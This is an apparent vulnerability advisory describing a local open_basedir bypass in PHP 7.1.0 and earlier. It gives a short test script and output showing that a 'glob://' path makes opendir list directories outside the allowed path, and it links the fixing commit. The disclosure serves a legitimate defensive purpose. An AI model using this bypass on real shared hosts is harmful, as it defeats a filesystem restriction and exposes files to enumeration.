PHP 7.1.0 and prior open_basedir bypass through glob wrapper

2017.01.10
Credit: Anonymous
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# ./php -v PHP 7.1.0 (cli) (built: Dec 23 2016 16:08:30) ( NTS DEBUG ) Copyright (c) 1997-2016 The PHP Group Zend Engine v3.1.0-dev, Copyright (c) 1998-2016 Zend Technologies Test script: --------------- <?php if ($dh = opendir($argv[1])) { while (($file = readdir($dh)) !== false) { echo "$file\n"; } closedir($dh); } Expected result: ---------------- Warning: opendir(): open_basedir restriction in effect. File(/dev/) is not within the allowed path(s): (/virtual/) in /virtual/php/71/bin/bypass.php on line 2 Warning: opendir(/dev/): failed to open dir: Operation not permitted in /virtual/php/71/bin/bypass.php on line 2 Actual result: -------------- # ./php bypass.php "/dev/" Warning: opendir(): open_basedir restriction in effect. File(/dev/) is not within the allowed path(s): (/virtual/) in /virtual/php/71/bin/bypass.php on line 2 Warning: opendir(/dev/): failed to open dir: Operation not permitted in /virtual/php/71/bin/bypass.php on line 2 # ./php bypass.php "glob:///dev/*" MAKEDEV apm apmctl arandom audio audio0 audio1

References:

https://github.com/php/php-src/commit/7e49e8e7970b423968de7a53ea9a0796f4634276


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top